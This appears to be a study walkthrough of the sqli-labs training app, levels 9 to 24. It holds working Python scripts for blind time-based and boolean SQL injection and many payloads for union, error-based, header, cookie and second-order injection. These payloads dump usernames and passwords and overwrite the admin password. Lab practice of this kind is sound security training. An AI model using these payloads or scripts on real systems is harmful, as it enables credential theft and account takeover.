sqli-labs
Less-9, 10 (time-based blind injection; the script below targets Less-10, whose parameter is closed with a double quote)
import requests
import time
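url = "http://10.160.104.208/sqli-labs-master/Less-10/?id="
flag = ''


def less10_payload(pos: int, code: int, delay: int = 2) -> str:
    """Build the Less-10 time-based probe for one (position, character) guess.

    ``pos`` is the 1-based offset into ``database()`` and ``code`` the ASCII
    value being tested.  The leading ``1"`` closes Less-10's double-quoted
    parameter; when the guess is right MySQL sleeps ``delay`` seconds,
    otherwise the query returns at once.  ``delay=2`` reproduces the original
    payload byte for byte.
    """
    return '1" and if(ascii(substr(database(),{},1))={},sleep({}),1)--+'.format(
        pos, code, delay
    )


def less10_hit(elapsed: float, delay: int = 2) -> bool:
    """Return True when a measured round-trip shows the injected sleep fired.

    Network latency is added on top of the server-side sleep, so a slow link
    can push a miss over the threshold; raise ``delay`` if results look noisy.
    """
    return elapsed >= delay


def less10_extract(base_url: str = url, max_len: int = 49, delay: int = 2,
                   timeout: float = 10.0) -> str:
    """Recover ``database()`` character by character over the time channel.

    Returns the recovered string (at most ``max_len`` characters; the original
    loop tried positions 1..49).  Extraction stops at the first position where
    no printable ASCII candidate triggers the delay, which is how the end of
    the value shows up.  ``timeout`` bounds each request so a stalled
    connection cannot hang the scan; it must stay larger than ``delay`` or a
    genuine hit would be cut off.

    ``requests`` is imported here, not at module level, so the pure helpers
    above can be used without it.  Lab target only (sqli-labs).
    """
    import requests

    found = ''
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            probe = base_url + less10_payload(pos, code, delay)
            print(probe)
            started = time.time()
            requests.get(url=probe, timeout=timeout)
            if less10_hit(time.time() - started, delay):
                found += chr(code)
                print(found)
                break  # exactly one character per position; skip the rest
        else:
            break  # nothing matched at this position: end of the value
    return found


if __name__ == "__main__":
    flag = less10_extract()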
`sec = end_time - start_time` measures the round-trip time of the GET request, which includes the server-side sleep(2) only when the guessed character is correct.
`if sec >= 2:` — when that delay is observed the character is appended to `flag` and printed; a request that returns faster means the guess was wrong.
less-11
Username:
-1' union select 1,group_concat(username)from users#
Password:
-1' union select 1,group_concat(password)from users#
less-12
1")
less-13
Closing sequence: 1')
1') and extractvalue(1,concat(0x7e,((select group_concat(username)from users)),0x7e))#
1') and extractvalue(1,concat(0x7e,((select group_concat(password)from users)),0x7e))#
less-14
1"
less-15
1' or ascii(substr((select group_concat(username)from users),1,1))#
1' or ascii(substr((select group_concat(password)from users),1,1))#
(These two only confirm the injection point: any non-zero ascii() value is truthy, so the login succeeds whatever the character is. To extract data the value must be compared against a candidate, e.g. `...,1,1))=N#`, which is what the script below does.)
import requests
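url = "http://10.160.105.77/sqli-labs-master/Less-15/"
flag = ""

# Less-15 shows no query output; the only oracle is the login result.  This
# image is referenced only on the "login succeeded" page, i.e. when the
# injected condition evaluated true.
LESS15_TRUE_MARKER = '../images/flag.jpg'


def less15_bool_payload(pos: int, code: int) -> str:
    """Build the Less-15 boolean-based probe for one (position, character) guess.

    ``pos`` is the 1-based offset into the ``group_concat(username)`` string
    and ``code`` the ASCII value tested.  ``admin'`` closes the single-quoted
    username and ``#`` comments out the rest of the original query, so the
    login succeeds only when the comparison is true.
    """
    return ("admin' and ascii(substr((select group_concat(username)from users),"
            "{},1))={}#").format(pos, code)


def less15_bool_hit(body: str) -> bool:
    """Return True when a response body is the login-succeeded page."""
    return LESS15_TRUE_MARKER in body


def less15_bool_extract(base_url: str = url, max_len: int = 49,
                        timeout: float = 10.0) -> str:
    """Recover the concatenated usernames through the boolean oracle.

    Returns the recovered string (at most ``max_len`` characters; the original
    loop tried positions 1..49) and stops at the first position where no
    printable ASCII candidate logs in, i.e. the end of the value.  Each POST is
    bounded by ``timeout`` so a stalled connection cannot hang the scan.

    ``requests`` is imported here, not at module level, so the pure helpers
    above stay importable without it.  Lab target only (sqli-labs).
    """
    import requests

    found = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            probe = less15_bool_payload(pos, code)
            # Both fields carry the probe, as in the original; the '#' after
            # uname should already comment out the password clause.
            data = {"uname": probe, "passwd": probe}
            response = requests.post(url=base_url, data=data, timeout=timeout)
            print(data)
            if less15_bool_hit(response.text):
                found += chr(code)
                print(found)
                break  # exactly one character per position; skip the rest
        else:
            break  # nothing matched at this position: end of the value
    return found


if __name__ == "__main__":
    flag = less15_bool_extract()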
import requests
import time
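url = "http://10.160.105.77/sqli-labs-master/Less-15/"
flag = ""


def less15_time_payload(pos: int, code: int, delay: int = 2) -> str:
    """Build the Less-15 time-based probe for one (position, character) guess.

    ``pos`` is the 1-based offset into the ``group_concat(username)`` string
    and ``code`` the ASCII value tested.  ``admin'`` closes the single-quoted
    username, ``#`` comments out the rest of the query, and a correct guess
    makes MySQL sleep ``delay`` seconds.  ``delay=2`` reproduces the original
    payload byte for byte.
    """
    return ("admin' and if(ascii(substr((select group_concat(username)from users),"
            "{},1))={},sleep({}),1)#").format(pos, code, delay)


def less15_time_hit(elapsed: float, delay: int = 2) -> bool:
    """Return True when a measured round-trip shows the injected sleep fired.

    Network latency is added on top of the server-side sleep, so a slow link
    can push a miss over the threshold; raise ``delay`` if results look noisy.
    """
    return elapsed >= delay


def less15_time_extract(base_url: str = url, max_len: int = 49, delay: int = 2,
                        timeout: float = 10.0) -> str:
    """Recover the concatenated usernames over the time channel.

    Returns the recovered string (at most ``max_len`` characters; the original
    loop tried positions 1..49) and stops at the first position where no
    printable ASCII candidate triggers the delay, i.e. the end of the value.
    ``timeout`` bounds each POST so a stalled connection cannot hang the scan;
    it must stay larger than ``delay`` or a genuine hit would be cut off.

    ``requests`` is imported here, not at module level, so the pure helpers
    above stay importable without it.  Lab target only (sqli-labs).
    """
    import requests

    found = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            probe = less15_time_payload(pos, code, delay)
            data = {'uname': probe, 'passwd': probe}
            print(data)
            started = time.time()
            requests.post(url=base_url, data=data, timeout=timeout)
            if less15_time_hit(time.time() - started, delay):
                found += chr(code)
                print(found)
                break  # exactly one character per position; skip the rest
        else:
            break  # nothing matched at this position: end of the value
    return found


if __name__ == "__main__":
    flag = less15_time_extract()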
less-16
")
less-17
报错注入:
uname=Dumb&passwd=1' or updatexml(1,concat(0x7e,(version()),0x7e),2)# //版本
uname=Dumb&passwd=1' or updatexml(1,concat(0x7e,(database()),0x7e),2)# //数据库
uname=Dumb&passwd=1' and updatexml(1,concat('!',(select group_concat(table_name)from information_schema.tables where table_schema = 'security')),2)# //表名
uname=Dumb&passwd=1' and updatexml(1,concat('!',(select group_concat(column_name)from information_schema.columns where table_schema= 'security')),2)# //列名
Data cannot be read from users directly here: Less-17 is a password-reset form, so the injected subquery runs inside an UPDATE on users, and MySQL does not let a statement read the table it is updating. Wrapping the SELECT in a derived table (the `(select username,password from users)text` alias below) materialises the rows first, and the outer query then reads from that copy:
uname=Dumb&passwd=1' and (updatexml(1,concat('!',(select concat_ws(':',username,password)from (select username,password from users)text limit 0,1)),1))#
修改limit n,m 查询数据
uname=Dumb&passwd=1' and (updatexml(1,concat('!',(select concat_ws(':',username,password)from (select username,password from users)text limit 1,1)),1))#
concat_ws()函数:用指定分隔符将多个字符串连接成一个字符串
用group_concat()函数表示
uname=Dumb&passwd=1' and (updatexml(1,concat(0x7e,((select group_concat(username,password)from (select username,password from users)text)),0x7e),1))#
less-18
Log in with the valid credentials: passwd=admin&uname=admin
Determine the closing character: a single quote (')
判断注入点为 User-Agent:
'or updatexml(1,concat("!",(select group_concat(password)from users)),1) or ' //passwords (the trailing `or '` closes the quote the application puts after the User-Agent value, as in the Less-19 payloads below)
或
1',1,updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),1))# //表
1',1,updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='users'),0x7e),1))# //列
1',1,updatexml(1,concat(0x7e,(select group_concat(password)from users),0x7e),1))# //字段
less-19
Determine the closing character: a single quote (')
判断注入点为 referer
'or extractvalue(1,concat("!",database())) or' //数据库
'or extractvalue(1,concat("!",(select group_concat(password)from users))) or'
less-20
输入正确的用户名和密码
passwd=admin&uname=admin
The page shows "Delete Your Cookie!", which points to the cookie as the injection point
uname=' union select 1,2,group_concat(password)from users#
less-24
二次注入:
1. Register a username containing 1'#
2. On the way in the quote is escaped, so the INSERT itself cannot be injected
3. The value stored in the database is nevertheless the original 1'# (escaping protects only that one query, not the stored data)
4. The stored 1'# is later used in another query — the second-order injection; this only works when the application does not escape the value again when it reads it back
In that later query `#` starts a comment, so everything after it is ignored; the `'` in admin'# closes the string opened before the username, and the quote the application appends after the username falls inside the comment. The statement therefore updates the password of admin, not of admin'#.
The login code escapes its input with mysql_real_escape_string, so direct SQL injection is not possible there.
Register a new account named admin'# (uname: admin'#, passwd: 123456).
Log in as admin'# and change its password to 111111.
The password of the real admin account has been changed instead.